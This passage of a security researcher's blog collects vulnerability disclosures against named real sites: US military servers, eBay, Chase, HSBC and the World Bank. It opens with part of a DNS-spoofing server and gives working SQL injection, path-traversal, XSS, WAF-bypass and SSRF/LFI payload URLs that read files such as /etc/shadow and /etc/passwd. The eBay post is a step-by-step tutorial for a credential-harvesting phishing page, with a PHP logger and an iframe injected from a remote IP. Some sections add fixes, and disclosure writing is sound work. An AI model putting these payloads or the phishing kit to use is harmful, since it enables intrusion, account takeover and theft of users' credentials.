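    # answer: compression pointer to the name at offset 12,
    # type A (1), class IN (1), TTL 60, 4-byte rdata
    answer = struct.pack(">HHHLH", 0xC00C, 1, 1, 60, 4) + socket.inet_aton(spoof_ip)
    return txid + flags + counts + question + answer

def serve(bind_ip="0.0.0.0", port=53):
    """Listen for DNS queries and spoof every answer."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        query, addr = sock.recvfrom(512)
        sock.sendto(build_spoofed_response(query, ATTACKER_IP), addr)
```

The real FakeDNS module adds things like target filtering and bypass lists, but the response-forging step is essentially this.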

My next blog post (besides maybe a few little tutorials coming first) will be covering a critical zero-day vulnerability that I have identified, with over 40,000 affected sites including UK Ministry of Defence, US Navy, NASA, Namecheap, ICANN, Time Warner Cable, Toshiba, FedEx and more🙂

thanks for reading

– M.

 

 

 

 

Military audits are necessary

This blog post will be covering some of my findings in the military sector, and also their lack of response. I am only posting this now because they finally patched just a few days ago; these vulnerabilities had been present for months. I've tried to contact them several times, but it's been no use whatsoever.

I'll start with the two major ones and then follow up with some XSS. First off is the US Department of Defense (specifically the Defense Contract Management Agency).

Here is a definition of the DCMA, taken from Google:

The Defense Contract Management Agency (DCMA) is the agency of the United States federal government responsible for performing contract administration services for the Department of Defense and other authorized federal agencies. Its headquarters is at Fort Lee, VA. DCMA often handles Foreign Military Sales contracts.

The vulnerability in question is an SQL injection, present via a slightly less common technology: a GET-based SQL injection in a flawed Java servlet, located on http://pubapp.dcma.mil/ – here is the message that you are greeted with when accessing that URL:


text:

Welcome to DCMA
You are accessing a U.S. Government (USG) Information System (IS) that is provided for USG-authorized use only.
By using this IS (which includes any device attached to this IS), you consent to the following conditions:
  • The USG routinely intercepts and monitors communications on this IS for purposes including, but not limited to, penetration testing, COMSEC monitoring, network operations and defense, personnel misconduct (PM), law enforcement (LE), and counterintelligence (CI) investigations.
  • At any time, the USG may inspect and seize data stored on this IS.
  • Communications using, or data stored on, this IS are not private, are subject to routine monitoring, interception, and search, and may be disclosed or used for any USG authorized purpose.
  • This IS includes security measures (e.g., authentication and access controls) to protect USG interests—not for your personal benefit or privacy.
  • Notwithstanding the above, using this IS does not constitute consent to PM, LE or CI investigative searching or monitoring of the content of privileged communications, or work product, related to personal representation or services by attorneys, or clergy, and their assistants. Such communications and work product are private and confidential. See User Agreement for details.

So, communications are routinely intercepted and monitored, yet it remains vulnerable to SQL injection for several months?

I had a media contact reach out to the Department of Defense to act as a middle-man of sorts, and when I showed the vulnerable link to the DoD they responded with something along the lines of "How do we get past the login wall; what are the steps to reproduce?" The 'login wall' they were referring to was literally just a warning about an invalid SSL cert:

Screenshot_2015-12-02_23-04-47

URL: 

https://pubapp.dcma.mil/CASD/setup_CasdPaymentOfficeReport.do?Seqid=36%27

As you can see in the screenshot above, it is just a warning, and getting around it was simply a case of clicking 'proceed'. The URL for the SQL injection can be seen above, and the vulnerable parameter was ?SeqId=

In many cases this wouldn't be such a big deal (I'm not saying people should be lax about web security here), as long as there is no way for an attacker to get shell access or anything similar, and as long as no sensitive data is stored on the server that could be exfiltrated. Of course, to know exactly what kind of data we are dealing with, access would have to be gained or the data stolen illegally, which I'm not going to do for obvious reasons. That being said, you can get a pretty good idea of what you're dealing with if the table names are outputted, and that is the case here: the output of those table names makes me believe this could be a serious issue, in the sense that the personal information of Department of Defense employees could possibly be exposed.

Below is the output that was received once ' (or its %27 URL-encoded equivalent) was injected into the parameter:

Error Message: JBO-27122: SQL error during statement preparation. Statement: SELECT * FROM (SELECT PAYMENT_OFFICE_ID, NAME, DODAAC, TELEPHONE_NUMBER, PHONE_COMMENT, FAX, FAX_COMMENT, DSN, DSN_COMMENT, EMAIL, COMMRI_PRIMARY, COMMRI_SECONDARY, COMMENTS, ADDRESS_LINE1, ADDRESS_LINE2, ADDRESS_LINE3, ADDRESS_LINE4, CITY, STATE_PROVINCE_CODE, ZIP_POSTAL_CODE, COUNTRY_CODE, (CITY || ', ' || nvl(STATE_PROVINCE_CODE, (select NM from COUNTRIES where CNTRY = COUNTRY_CODE))) LOCATION FROM CASD_PAYMENT_OFFICES) QRSLT WHERE (PAYMENT_OFFICE_ID = 36') ORDER BY upper(NAME) ASC

Here is a live screenshot of the page output (taken from phone):

[screenshot]
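The underlying flaw is textbook: user input is concatenated straight into the SQL statement, which is why a single quote produces that JBO-27122 error. Below is a minimal sketch of the broken pattern and the parameterized fix, using Python/sqlite3 with a made-up table for illustration (the real servlet is Java against Oracle, but the principle is identical):

```python
import sqlite3

# toy stand-in for the real table
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE casd_payment_offices (payment_office_id INTEGER, name TEXT)")
conn.execute("INSERT INTO casd_payment_offices VALUES (36, 'Example Office')")

def lookup_unsafe(seq_id: str):
    # Vulnerable: input concatenated into the statement, so "36'" breaks out
    return conn.execute(
        "SELECT * FROM casd_payment_offices WHERE payment_office_id = " + seq_id
    ).fetchall()

def lookup_safe(seq_id: str):
    # Fixed: the driver binds the value, so quotes in the input are inert
    return conn.execute(
        "SELECT * FROM casd_payment_offices WHERE payment_office_id = ?", (seq_id,)
    ).fetchall()
```

With the safe version, injecting 36' simply matches no rows instead of mangling the statement.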

The fact that they make themselves so hard to contact, with no defined method, alongside the fact that they refer to a page warning about an invalid SSL cert as a 'login wall', makes me really question their credibility. The guy who made the login wall comment is a supposed infosec contact at the Department of Defense and was notified of this vulnerability months ago; it was only patched in the past few days. What if some blackhats had found this vulnerability and exploited it, and are now in possession of the personal information of a bunch of DoD employees? Judging from those warnings on the index page, I expected them to take their site security at least somewhat seriously.

As of writing this blog, attempting to access the vulnerable link throws an HTTP 500 error, which suggests to me that it has successfully been patched:

Screenshot_2016-01-13_17-51-40

It’s pretty crazy to think that a Department of Defense server would be vulnerable to something so obvious and simple to patch.

But the next finding is an even bigger fuck-up: LFD (local file disclosure) on a US Army server with probably some of the worst security I've ever seen. For some reason that is completely beyond me, they have their HTTP daemon running as root, and the vulnerable script has root privs also. Albeit this was just some subdomain, the fact that something on a military server can be so insecure is baffling. Here is the path to the vulnerability in question (now also patched):

http://mesl.apgea.army.mil/mesl/account/EHFileDownload?fileString=../../etc/shadow

I noticed the ?fileString= param and tried ../../etc/shadow as input, in no way expecting it to actually work (I just wanted to see what kind of output I got, to see how the script behaves – if I had actually wanted to obtain a local system file, the passwd file would have been my first choice). As soon as I loaded the URL, it downloaded the shadow file without even giving me a prompt first. I literally could not believe it.
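For anyone wondering what the fix looks like: a download handler needs to canonicalise the requested path and verify it stays inside the intended directory before serving anything. A hedged Python sketch of that check (the real script was Java, and the base directory here is invented for illustration):

```python
import os

# hypothetical document root for the sketch; resolved once so symlinks
# in the base path don't break the comparison below
BASE_DIR = os.path.realpath("/var/www/downloads")

def resolve_download(file_string: str) -> str:
    """Resolve a requested filename, rejecting anything that escapes BASE_DIR."""
    full = os.path.realpath(os.path.join(BASE_DIR, file_string))
    if not full.startswith(BASE_DIR + os.sep):
        raise PermissionError("path traversal attempt: " + file_string)
    return full
```

With this in place, fileString=../../etc/shadow resolves to a path outside the download root and is refused instead of handed to the client.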

This vulnerability was patched maybe a month or so after I reported it (albeit with no response from the Army) – at least this one was patched much more quickly than the DoD vuln.

Below is the output of their shadow file with the sensitive info covered over. Although they have taken the server down, if they bring it back up after patching the vulnerability there's a chance they may not have fully changed the users' credentials, and we don't want someone cracking the root password and opening an SSH connection to their server, hence me blocking it out. It should also be noted that they are using MD5 format for the shadow hashes, rather than something that's actually somewhat secure like $6$ (SHA-512) hashes.

[screenshot]

Next, I stumbled across this (I really hope this is an outdated subversion repo containing old credentials, and not current live credentials!):

Here is the file I found (config.php):

http://adh.usace.army.mil/svn/adh/adh-doc/svnScripts/include/config.php

Here is some of the output:

//
// This is the username for your database connection
// This is the hostname for your database connection
// This is your password for your database connection
if ($WHERE=="TEST")
{
	$dbuser = "dbSVNuser";
	$dbhost = "as2.erdc.dren.mil";
	$dbpassword = "mysecretpassword";
}
else
{
	$dbuser = "dbSVNuser";
	$dbhost = "as2.erdc.dren.mil";
	$dbpassword = "mysecretpassword";
}
// This is your database name
$database = "SVNmanage";

If 'mysecretpassword' is actually a valid credential for a DBMS connection to a military server, then they have some pretty serious issues – more so than the SQLi and LFD, considering this wouldn't be a vulnerability in the sense of badly written software, but rather in the sense that whoever put that file there is beyond stupid (definitely not the kind of person you'd want administrating a military system). Here is a screenshot of the output from config.php:

[screenshot]

Now I will cover some more minor vulnerabilities I've identified in .mil systems (namely XSS). First off, I've noticed that a bunch of .mil systems have controlled redirects in which the user is warned before they are redirected, and told to click the link to the destination site (embedded on the page) in order to be redirected to their site of choice.

To exploit this, it's just a case of 'redirecting' to the javascript: directive and then clicking the destination "URL", like so:

javascript:alert(document.domain)

This then works in a similar way to an attribute-based XSS using the onclick= event handler.
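The fix for these controlled redirects is to validate the target's scheme before embedding the link. A small Python sketch of the idea (function and allowlist names are mine, not from any of the affected sites):

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_redirect(target: str) -> bool:
    """Refuse javascript:, data:, vbscript: and other non-web schemes.

    Note: scheme-less relative paths are also rejected here; a real
    implementation would want to allow those explicitly.
    """
    scheme = urlparse(target.strip()).scheme.lower()
    return scheme in ALLOWED_SCHEMES
```

With a check like this, javascript:alert(document.domain) never makes it into the clickable link in the first place.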

The first live example I will display this on is a disa.mil subdomain – Here is an explanation of what DISA is:

The Defense Information Systems Agency (DISA), known as the Defense Communications Agency (DCA) until 1991, is a United States Department of Defense (DoD) combat support agency composed of military, federal civilians, and contractors. DISA provides information technology (IT) and communications support to the President, Vice President, Secretary of Defense, the military services, the combatant commands, and any individual or system contributing to the defense of the United States.

According to the mission statement on the agency website, DISA “provides, operates, and assures command and control, information sharing capabilities, and a globally accessible enterprise information infrastructure in direct support to joint warfighters, National level leaders, and other mission and coalition partners across the full spectrum of operations.” DISA’s vision is “Information superiority in defense of our Nation.”

Although it's only XSS, should a site that is responsible for offering computing support to the likes of the president and military services be vulnerable to something so basic?
Here is the live URL at the time of testing:
Screenshot:
[screenshot]

 

It should be noted that the above vulnerability is on a login portal for Department of Defense employees. Based on some initial testing, it would appear that hijacking cookies is a possibility here (along with spear phishing of course, although that would be ineffective due to the disclaimer about an external site). If an attacker had some interaction with employees who had access to this login portal and managed to hijack their cookies and authenticate as them, the implications could be huge (potential access to classified data, etc.)

While the above vulnerability is in ASP.NET, there are many other technologies vulnerable in the exact same way. Here is pretty much the same vulnerability on an army.mil server, but through ColdFusion this time:

http://corpslakes.usace.army.mil/employees/link.cfm?Link=javascript:alert%28document.domain%29

Screenshot:

Screenshot_2016-01-17_14-34-03

Now time for some more conventional (typical GET-based reflective) XSS within the .mil domain, here is the first:

https://www.dmdc.osd.mil/appj/dwp/searchResults.jsp?search=%22%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E

This is the Defense Manpower Data Center, which is part of the Office of the Secretary of Defense, a headquarters-level staff section of the Department of Defense. Here is the output of the URL at the time:

Screenshot_2016-01-17_14-37-14

Next up is the National Geospatial Intelligence Agency:

URL:

https://datahost.nga.mil/elist/email_escribe.php?type=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Screenshot:

nga

and another (more than just XSS here if you search hard enough😉 ):

URL:

http://msi.nga.mil/NGAPortal/msi/query_results.jsp?MSI_queryType=BroadcastWarning&MSI_generalFilterType=Category&MSI_generalFilterValue=12%27%22%3E%3Csvg/onload=confirm%28document.domain%29%3E&MSI_additionalFilterType1=All&MSI_additionalFilterType2=-999&MSI_additionalFilterValue1=-999&MSI_additionalFilterValue2=-999&MSI_outputOptionType1=SortBy&MSI_outputOptionType2=-999&MSI_outputOptionValue1=Number_DESC&MSI_outputOptionValue2=-999

Screenshot:

nga2

Now onto some more XSS that require WAF bypass (funny thing… they actually removed a fairly decent WAF for no apparent reason).

This one is in a bunch of .mil sites running the APEX engine (more info here: https://www.packtpub.com/packtlib/book/Application-Development/9781847194527/3/ch03lvl1sec05/The%20f?p%20URL%20notation). I was originally triggering the XSS within browser context rather than domain context, by redirecting to a data: URI within the url param like so:

http://www.militaryinstallations.dod.mil/MOS/f?p=MI:5:0::::url:type=external|url=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==

Ideally you would want this to be triggered within domain context, and it can be done via JavaScript Unicode escape sequences (to stop alert/prompt/confirm being filtered by the WAF) and the use of // in place of the closing HTML tag.
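The reason pr\u006fmp\u0074 slips past the WAF is that JavaScript resolves Unicode escapes (even inside identifiers) before execution, so it is literally the identifier prompt. Python happens to share the same \u string-escape syntax, which makes it easy to demonstrate what the WAF's string matcher never sees:

```python
# JavaScript resolves \u escapes before executing, so in JS source
# pr\u006fmp\u0074(1) calls prompt(1). Python strings use the same
# escape syntax, so the decoded form can be shown directly:
obfuscated = "pr\u006fmp\u0074"
print(obfuscated)                # prompt
print(obfuscated == "prompt")    # True
```

A filter matching on the literal substring "prompt" therefore misses the payload entirely, while the browser still executes it as prompt().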

Thanks to @mradamdavies for the following method (he turned it into content injection also https://twitter.com/mradamdavies/status/678788157639389184)

this is the bypass method that was used:

http%3A//www.owned.com”><svg/onload=pr\u006fmp\u0074(document.domain)//

Screenshot:

[screenshot]

Some more .mil sites vulnerable to the same thing:

http://www.usa4militaryfamilies.dod.mil/pls/psgprod/f?p=MI:5:0::::url:type=external|url=http%3A//www.owned.com%22%3E%3Csvg/onload=pr\u006fmp\u0074%28document.domain%29//

http://www.militaryonesource.mil/pls/psgprod/f?p=PMM:5:0::::url:type=external|url=http%3A//www.vuln.org%22%3E%3Csvg/onload=pr\u006fmp\u0074%28document.domain%29//

http://apps.militaryonesource.mil/pls/psgprod/f?p=PMM:5:0::::url:type=external|url=http%3A//www.vuln.org%22%3E%3Csvg/onload=pr\u006fmp\u0074%28document.domain%29//

Also it should be noted that many other sites are running apex engine and are vulnerable to the exact same thing (oracle.com being one example)

Next is some POST-based XSS in a navy.mil server (in their Chief of Naval Air Training subdomain):

https://www.cnatra.navy.mil/pubs.asp

POST DATA:

searchTextbox=”><svg%2Fonload%3Dconfirm(0)>

Screenshot:

Screenshot_2016-01-13_18-02-53

And finally I will finish up with some reflective GET-based XSS in apd.army.mil. They had a filter set up here which converted input from lowercase to uppercase, meaning that HTML could be injected no problem, but injecting JavaScript was more tricky (HTML being case-insensitive whereas JavaScript is case-sensitive). The first thing to try in a case like this is to include the JavaScript payload remotely, using the src= attribute within a script tag to pull in a .JS file from a remote URL.

This payload still wasn't working, for three reasons: first, spaces were being stripped; second, http:// was being stripped from the URL, so the JavaScript payload wasn't being included remotely as intended; and third, the opening script tag was being partially stripped too. One way around this is to use object tags like so:

< object type=" text/x-scriptlet " data=" http://jsfiddle.net//fb5upheq " >< / object>

Although this will still produce an alert (and is considered valid XSS by OWASP), it isn't ideal, as the script isn't executing within the context of the domain. Thanks to @asdizzle_ for some help with this bypass method:

" > < / title > < script / src=" //www.xssposed.org/ 1.JS "> < / script >

Note: the above payloads don't actually contain spaces. script/src= works in the same manner as script src= would; the closing title tag at the start prevents the script tag from being filtered; and // can be used in place of http:// (which is worth remembering, as it comes in handy in XSSes where you have a limit on the number of chars you can inject).

Screenshot:

[screenshot]

These are just some of many examples of vulnerabilities in US military systems. It should be noted that I've made many efforts to contact them so I could report these, and that I didn't release any details of the more serious vulnerabilities until after I'd managed to confirm that they had been patched.

For some reason, the military are practically impossible to contact when it comes to reporting vulnerabilities. Not only do they not have a bug bounty programme (which is understandable), they actually have no viable means for researchers to reach out to them in order to report vulnerabilities; I guess they have the mindset that their systems are secure, therefore there is no need for a channel through which people can report potential security risks. There has been much discussion in the past about calls for an army bug bounty programme, or at the very least some kind of platform where someone can report vulnerabilities with ease, but for some reason this hasn't yet been implemented (despite the Army themselves suggesting it – see here: http://securityaffairs.co/wordpress/41474/intelligence/us-army-all-bug-bounty-avrp.html and also here: http://www.cyberdefensereview.org/2015/10/23/avrp/)

I know I said my next post was going to be on some of the more sophisticated phishing techniques – that's coming next, I promise🙂

that’s all for now,

M.

 

 

 

 

A tale of eBay XSS and shoddy incident response

Hello, this blog post will highlight exactly how easy it is to exploit XSS vulnerabilities in large sites, and also how little these companies actually care (until they run the risk of being publicly exposed). I'll be keeping this post fairly short, just showing a quick demonstration of how easy it is to exploit things like this. As of writing this blog post, the vulnerability is now patched, but it should be pointed out that I waited a month with no response from eBay, and they only rushed to patch the vulnerability after the media contacted them about it.

Take the following URL:

http://ebay.com/link/?nav=webview&url=javascript:alert(document.cookie)

Screenshot of live URL:

[screenshot]

This is a fairly basic vulnerability (no WAF bypass or anything of that sort required) on a site where XSS would generally be considered a huge issue (even more so since the main domain is involved). It should be noted that while the above URL is crafted to display the document.cookie output, the session cookies cannot be stolen due to the HttpOnly flag being set.

For some sites, spear phishing is considered useless (for example if the site does not have a large userbase that requires logins), but in the case of this site it has many valid uses – it could be used to steal funds from people, to use trusted eBay accounts to scam other users, and more.

First I am going to explain the steps required to set up an authentic-looking phishing page, then I am going to apply these steps to eBay to show how easily this can be achieved. Obviously the first step is to obtain a copy of the website's source for the login page. You could do this by saving the source code after viewing it manually, but this is time-consuming and inefficient: for the page to look identical you would need to individually download every single image on the page, ensure they are saved in the correct directories, and create the relevant directories or alter the paths to images and other pages in the source code. Alternatively you can use website mirroring software to automate this process, which is what I suggest doing.

The software I suggest using is WebHTTrack, because it is efficient, easy to use, and cross-platform. To install it on Windows, just download the executable and run it. To install on Linux (Debian-based), use the following commands:

apt-get update
apt-get install webhttrack

 

To install on other distros (such as CentOS/RHEL), just wget/cURL the tarball, unpack it, then configure and build; the following commands can be used:

yum install zlib-devel
wget http://download.httrack.com/cserv.php3?File=httrack.tar.gz -O httrack.tar.gz
tar xvfz httrack.tar.gz
cd httrack-*
./configure
make && sudo make install

The screenshots below will detail the process required to mirror the site via WebHTTrack (for this demonstration I will be using the web-based client for linux):

httrack1

This page should launch locally in your browser after running the app

httrack2

The next step is to choose your project name and set the path to where you want the files to be mirrored

httrack3

After this, it's just a case of inputting the URL of the page you want to mirror. There are also some additional options you can select, but the defaults will work fine.

After this, the mirroring process will begin. If all goes well, you should have all of the files for the page downloaded to the directory that you specified:

[screenshot]

After this, you need to change the form inputs for the page (for the login form) to send data to your PHP script (more on this soon), rather than a login script that is part of eBay:

[screenshot]

Use a text editor to search for the form tag within the HTML source of the login page, and change the action= attribute to point to your PHP script. After this you'll want to upload the relevant files to your site (presumably to the /var/www/html directory); to do this I suggest using an FTP/SFTP client such as FileZilla.

Once you've got the files uploaded to the relevant directory, it's time to make the PHP script (obviously you'll need PHP installed alongside your HTTP daemon for this). Here is the script I used:

root@MLT:/var/www/html/ebay/signin.ebay.com/ws# cat log.php
<?php

file_put_contents("log.txt", $_GET['1383430133'].":".$_GET['1794992350'].PHP_EOL, FILE_APPEND);

die(header('Location: http://ebay.com/'));
?>

If you’re modifying this for another site, you’ll need to change the GET inputs to match those relevant to the site in question.

Next, you'll have to ensure that the permissions are correctly set up so that the web server user can write to your logfile (log.txt); the following command can be used:

chmod 666 log.txt

After this, you can test it locally on your site by loading the login form and entering a username and password, then checking log.txt to see if it writes to it as expected.

The next step is to include the link to your phishing page within the context of the vulnerable site. In the case of eBay, the XSS vulnerability was not tag-based but rather pure JavaScript, so rather than including an iframe directly as input to the ?url= GET param, the JavaScript document.write function needed to be used to write the HTML to the page and embed the iframe.

The iframe containing my phishing page was injected into the page using the following payload:

document.write('<iframe src="http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html" width="1500" height="1000">')

Further obfuscation could be used, for example URL-encoding the remote URL and adding a frameborder="0" attribute to the iframe to remove the border of the frame, but for the purposes of demonstrating this vulnerability the above payload works fine.

Here is the full URL at time of injection:

http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29

and here is a screenshot of the live URL:

[screenshot: the injected phishing page live on ebay.com]

After the user credentials are entered on the phishing page that appears to be part of ebay.com, a GET request is made to log.php on my server and the inputs are written to log.txt available for me to read in plaintext.

Here is a video proof of concept, demonstrating the vulnerability in real-time:

This post was intended to give beginners an understanding of the steps required to set up a phishing page for spear phishing. I will update this post later with my correspondence with eBay, to give anyone reading this an idea of how you should not handle security incidents relating to your site.

My next blog post will cover some of the more advanced phishing techniques, such as how to properly obfuscate a spear phishing attack, and an explanation of methods such as bitsquatting and IDN homograph attacks.

That’s all for now

M.

 

Hacking banks for fun and profit

Greetings, this is my first blog post. In this post I will be detailing some vulnerabilities I have identified after doing some quick tests on several banks. It’s a sad state of affairs when you can find vulns such as XSS, CSRF and LFI on many major banks.

I’ll start with some of the more minor vulnerabilities. While the banks generally *do* tend to have good XSS filters in place, they seem to forget about the dangers of redirects (in some of these cases the redirects can easily be turned into XSS).

The first bank is JPMorgan Chase, where within 5 minutes I found some open redirect vulnerabilities: no authorisation required to redirect to an external site, and no warning message to tell the user they’re about to be redirected. Below are the examples (redirecting to my blog for the purposes of this example):

http://commercialbanking.chase.com/etrack.ashx?M=1725.7b601f6c-c54d-456a-b31b-364c5c501873&L=29102&URL=https://ret2libc.wordpress.com/

Note: both of these URLs use the same etrack.ashx endpoint to perform the redirect.

http://jpmts.jpmorgan.com/etrack.ashx?M=1212.721a7f5a-1828-4e96-b937-d73ca54e3033&URL=https://ret2libc.wordpress.com/

The security risk here, of course, is that an unsuspecting user could click a seemingly innocent URL which appears to be part of the bank’s website, and then be redirected to a phishing page where they are prompted to enter their account details.

Another risk related to open redirects is cross-site request forgery, as an attacker could redirect a user of the bank to links that are still part of the site but that could be used to execute unauthorised actions from the account of the victim who clicks the link.

One trick is to redirect directly to a data: URI with a base64-encoded input containing your HTML/JavaScript, allowing you to build the fake login page in the context of the victim’s browser itself rather than within the context of another site. It could be argued that this offers further obfuscation, as the victim’s address bar won’t display a phony URL but will instead just display ‘data:’ (assuming padding is added to the URI, in which case the base64-encoded input will not be displayed in the address bar).

An example payload would look something like:

data:text/html;base64,PHNjcmlwdD5hbGVydCgnRXhhbXBsZScpPC9zY3JpcHQ+

The first part of the string tells the browser what kind of data to expect, and the second part (after the comma) is the base64-encoded input that would contain the HTML for your phishing page, or whatever you decided to use on the victim.

To break that down:

PHNjcmlwdD5hbGVydCgnRXhhbXBsZScpPC9zY3JpcHQ+

is a base64 encoded version of:

<script>alert('Example')</script>
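Building such a data: URI is a one-liner in most languages. A quick Python sketch reproducing the string above:

```python
import base64

# HTML/JS to smuggle inside the data: URI
html = "<script>alert('Example')</script>"

# Base64-encode it and prepend the media type
b64 = base64.b64encode(html.encode()).decode()
uri = "data:text/html;base64," + b64
print(uri)
```

Dropping the resulting URI into a vulnerable URL= parameter gives the same effect as the live examples in this post.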

A live example of the URL can be found here:

http://commercialbanking.chase.com/etrack.ashx?M=1725.7b601f6c-c54d-456a-b31b-364c5c501873&L=29102&URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==

It should be noted that the above URL only works in Firefox. Here is another example on another large bank (HSBC):

http://fundexpress.tw.personal-banking.hsbc.com/FileProxy.aspx?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==

The fact that this can be used to spear phish and force malicious downloads is kinda scary, but because the URI operates in the context of the victim’s browser rather than the site, hijacking cookies via this method is not possible, which brings me onto the next section of this blog post. Having an XSS that affects a bank where cookie hijacking is a real possibility seemed like an interesting challenge, so I moved onto my next target, the World Bank.

After maybe 5 minutes of searching, I found a valid vulnerability (although some user interaction is required, it’s only the kind of interaction users would be expected to perform anyway).

It is again using a URL= GET parameter, but this time the JavaScript is loaded within the context of the site rather than only within the context of the victim’s browser (in other words, it’s reflected).

Here is the vulnerable URL (in order to trigger it you must click ‘here’):

https://wbssoextcl.worldbank.org/regconfirm.jsp?URL=javascript:alert%28document.cookie%29

Screenshot:

[screenshot: the alert box showing document.cookie]

An XSS vulnerability in a bank, affecting cookies (albeit reflected). At this point I decide to do some more digging and look for something more major, and I come across the following URL:

https://remittanceprices.worldbank.org/en/corridorgenpdf?url=

At first I assume it’s an open redirect, but then I realise it’s something far more interesting. You give it a URL and it fetches that URL, converts the page to PDF format, and prompts the user to download it. Here is a working example:

https://remittanceprices.worldbank.org/en/corridorgenpdf?url=http://twitter.com/ret2libc

It converts the user-supplied URL into PDF format, as seen here:

[screenshot: the PDF generated from the supplied URL]

Now, the risk associated with this is that a user could be served content as a PDF from a trusted source (the World Bank), and that PDF could contain contact information that puts the victim right in touch with a fraudster, or links them to a phishing website. It would just be a case of setting up the output you want served to the user on one of your servers, then setting it as the input for the ?url= param. It’s a pretty interesting vector (comparable to the CSV Excel Macro Injection, aka CEMI, bugs that have been floating around lately), but still not too high of a security risk – probably about the same level as a reflected XSS or the redirects to data: URIs shown at the start of this post.

My next thought was: if it’s fetching remote URLs and serving them as PDFs, what’s to stop it from fetching local URLs?

I then attempted some testing for SSRF / XSPA and it worked like a charm.

The following URL was inputted for testing (in an attempt to see whether I could probe for info on their SMTP daemon):

https://remittanceprices.worldbank.org/en/corridorgenpdf?url=http://127.0.0.1:25

As you can see from the screenshot below, the output was converted to a PDF file by a script on their server and downloaded, available for anyone to view:

[screenshot: the SMTP daemon’s banner, rendered as a PDF]

Here’s another test, this time probing the MySQL port to see if the version info is disclosed, using the following input:

http://127.0.0.1:3306

Once again, worked with no issues:

[screenshot: the MySQL port’s response, rendered as a PDF]
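This port-probing step can easily be scripted. A rough sketch in Python (the port list is my own illustrative choice, not what I actually tested beyond 25 and 3306):

```python
# Ports worth probing through the PDF converter (illustrative selection)
ports = [21, 22, 25, 80, 3306, 6379]

base = "https://remittanceprices.worldbank.org/en/corridorgenpdf?url="

# One probe URL per port; each generated PDF captures whatever banner
# the local service prints on connect
probes = [base + "http://127.0.0.1:%d" % port for port in ports]

for url in probes:
    print(url)
```

Requesting each URL and checking which PDFs come back non-blank maps out the listening services on the host.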

The SSRF alone is a pretty nasty vuln, but instantly after finding it my next thought was: can it be leveraged into LFI via the file:/// handler?

Short answer: yes, it can. Easily.

First I tried probing for /etc/hosts, via the following input:

file://etc/hosts

The result? A blank PDF. I then try using only one forward slash rather than two, for example:

file:/etc/hosts

Worked instantly. Readable local system files on a large financial institution:

[screenshot: /etc/hosts served as a PDF]

The final test I made before reporting (nope, I’d rather not exploit this – I appreciate my anal virginity) was using the file:/// handler to see if /etc/passwd was readable, and once again there it is, served to me straight away as a PDF file:

[screenshot: /etc/passwd served as a PDF]

After this I find a ?filename= param while searching for some more XSS (preferably one that requires no user interaction). I immediately begin testing for LFD, and at first it fails, using the following method:

../../../../../../../../etc/passwd

I notice the forward slashes are being stripped and a file extension is being appended by default, so I try some encoding and the addition of a null byte to see if I can get around it. My payload now looks like this:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
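That encoded payload can be reproduced with urllib; conveniently, quote() percent-encodes the trailing null byte as well (a sketch, not how it was originally built):

```python
from urllib.parse import quote

# Eight levels of traversal, with every slash percent-encoded to evade the
# stripping, plus a trailing null byte to drop the appended file extension
payload = quote("../" * 8 + "etc/passwd" + "\x00", safe="")
print(payload)
```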

And it works instantly (despite throwing a 404 message at me):

[screenshot: /etc/passwd retrieved via the encoded traversal payload]

After finding these vulnerabilities, my next thought is to report them to allow the sysadmins some time to patch – so I start looking for a contact method, which leads me to their next huge failure.

I find an email contact form, located at http://web.worldbank.org/external/default/main?pagePK=50041377&piPK=50041375&theSitePK=225714&contentMDK=22879511

You can see the form below:

[screenshot: the email contact form]

I enter my own email address as the recipient’s email, then I enter admin@worldbank.org as my own email, as seen below:

[screenshot: the form filled in with spoofed sender details]

I enter the captcha and click ‘send’ and instantly get a prompt confirming that the mail has been sent:

[screenshot: confirmation that the mail was sent]

I check my email to confirm, and here we go, a message from DO_NOT_REPLY@worldbank.org telling me that admin@worldbank.org has sent me a message:

[screenshot: the spoofed email as received]

The fact that someone has INTENTIONALLY built this is kinda scary; a site like this should not have such incompetent sysadmins. This could be paired with the XSS in worldbank.org to effectively hijack cookies or launch other attacks. Here is an example attack scenario:

  • Attacker obtains a list of email addresses associated with worldbank.org
  • Attacker then sends out mail seemingly from admin@worldbank.org to the emails in the list
  • Emails contain a link to the XSS, with a payload set up to hijack cookies and store them on the attacker’s server
  • victims click link
  • ???
  • PROFIT

Generally it would be time-consuming for an attacker to obtain a list of emails associated with a site, but in the case of the World Bank it’s trivial: simply request the following page to view a list of email notification subscribers:

https://icsid.worldbank.org/apps/ICSIDWEB/_layouts/mobile/view.aspx?List=08cea935-2ea4-4c00-8943-137e4974068e&View=4496ef14-9fde-4f3b-ba03-89a02d8f6a7b

List of subscribers available for anyone to read:

[screenshot: the subscriber list]

Not only that, but if an attacker wanted to personally tailor the emails to a target, they can find out their personal information by simply clicking their name within the subscriber list:

[screenshot: a subscriber’s personal details]

As of publishing this blog post, I’ve received no reply from worldbank.org. I have received a reply from Chase/JPMorgan, but no reply from HSBC – I have something similar (SSRF/LFD) in HSBC, but since they actually seem to care about their security I will withhold that information until after a patch.

Happy Hunting,

M.